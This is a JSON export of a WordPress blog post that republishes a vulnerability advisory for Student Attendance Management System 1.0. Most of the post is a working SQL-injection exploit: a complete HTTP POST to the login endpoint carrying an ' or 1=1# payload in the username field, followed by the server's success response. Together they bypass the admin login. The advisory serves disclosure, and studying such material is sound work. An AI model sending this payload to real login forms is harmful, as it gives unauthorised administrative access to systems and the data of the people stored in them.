{"id":57668,"date":"2024-06-24T17:30:13","date_gmt":"2024-06-24T14:30:13","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/179190\/studentams10-sql.txt"},"modified":"2024-06-24T17:30:13","modified_gmt":"2024-06-24T14:30:13","slug":"student-attendance-management-system-1-0-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/student-attendance-management-system-1-0-sql-injection\/","title":{"rendered":"Student Attendance Management System 1.0 SQL Injection"},"content":{"rendered":"<p>## Titles: Student Attendance Management System-1.0 Bypass Authentication<br \/>SQLi<br \/>## Author: nu11secur1ty<br \/>## Date: 06\/22\/2024<br \/>## Vendor: https:\/\/github.com\/oretnom23<br \/>## Software:<br \/>https:\/\/www.sourcecodester.com\/php\/14561\/student-attendance-management-system-using-phpmysqli-source-code.html<br \/>## Reference: https:\/\/portswigger.net\/web-security\/sql-injection<\/p>\n<p>## Description:<br \/>The username parameter is not properly sanitized, so an attacker can inject<br \/>queries directly into the login form and easily bypass the authentication of<br \/>the admin account.<\/p>\n<p>STATUS: CRITICAL- Vulnerability<\/p>\n[+]Exploits:<br \/>&#8211; Exploit:<br \/>&#8220;`POST<br \/>POST \/student_attendance\/ajax.php?action=login HTTP\/1.1<br \/>Host: pwnedhost.com<br \/>Cookie: PHPSESSID=2otv2s74md44qhb7do890mhhp4<br \/>Content-Length: 104<br \/>Sec-Ch-Ua: \"Not\/A)Brand\";v=\"8\", \"Chromium\";v=\"126\"<br \/>Accept-Language: en-US<br \/>Sec-Ch-Ua-Mobile: ?0<br \/>User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36<br \/>(KHTML, like Gecko) Chrome\/126.0.6478.57 Safari\/537.36<br \/>Content-Type: application\/x-www-form-urlencoded; charset=UTF-8<br \/>Accept: *\/*<br \/>X-Requested-With: XMLHttpRequest<br \/>Sec-Ch-Ua-Platform: \"Windows\"<br \/>Origin: https:\/\/pwnedhost.com<br \/>Sec-Fetch-Site: same-origin<br \/>Sec-Fetch-Mode: 
cors<br \/>Sec-Fetch-Dest: empty<br \/>Referer: https:\/\/pwnedhost.com\/student_attendance\/login.php<br \/>Accept-Encoding: gzip, deflate, br<br \/>Priority: u=1, i<br \/>Connection: keep-alive<\/p>\n<p>username=nu11secur1ty&#8217;+or+1%3D1%23&amp;password=stupiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiid<br \/>&#8220;`<\/p>\n[+]Response<br \/>&#8220;`HTTP<br \/>HTTP\/1.1 200 OK<br \/>Date: Sat, 22 Jun 2024 06:37:41 GMT<br \/>Server: Apache\/2.4.56 (Win64) OpenSSL\/1.1.1t PHP\/8.2.4<br \/>X-Powered-By: PHP\/8.2.4<br \/>Expires: Thu, 19 Nov 1981 08:52:00 GMT<br \/>Cache-Control: no-store, no-cache, must-revalidate<br \/>Pragma: no-cache<br \/>Content-Length: 1<br \/>Keep-Alive: timeout=5, max=100<br \/>Connection: Keep-Alive<br \/>Content-Type: text\/html; charset=UTF-8<\/p>\n<p>1<br \/>&#8220;`<\/p>\n<p>## Reproduce:<br \/>[href](https:\/\/www.patreon.com\/posts\/student-system-1-106665723)<\/p>\n<p>## Proof and Exploit:<br \/>[href](https:\/\/www.patreon.com\/posts\/student-system-1-106665723)<\/p>\n<p>## Time spent:<br \/>01:25:00<\/p>\n","protected":false},"excerpt":{"rendered":"<p>## Titles: Student Attendance Management System-1.0 Bypass AuthenticationSQLi## Author: nu11secur1ty## Date: 06\/22\/2024## Vendor: https:\/\/github.com\/oretnom23## Software:https:\/\/www.sourcecodester.com\/php\/14561\/student-attendance-management-system-using-phpmysqli-source-code.html## Reference: https:\/\/portswigger.net\/web-security\/sql-injection ## Description:The username parameter is not sanitizing well, the attacker can injectdirect queries into the login form and easily bypass the authentication ofthe admin account. 
STATUS: CRITICAL- Vulnerability [+]Exploits:&#8211; Exploit:&#8220;`POSTPOST \/student_attendance\/ajax.php?action=login HTTP\/1.1Host: pwnedhost.comCookie: PHPSESSID=2otv2s74md44qhb7do890mhhp4Content-Length: 104Sec-Ch-Ua: &#8220;Not\/A)Brand&#8221;;v=&#8221;8&#8243;, &#8220;Chromium&#8221;;v=&#8221;126&#8243;Accept-Language: en-USSec-Ch-Ua-Mobile: &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-57668","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57668","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=57668"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57668\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=57668"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=57668"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=57668"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}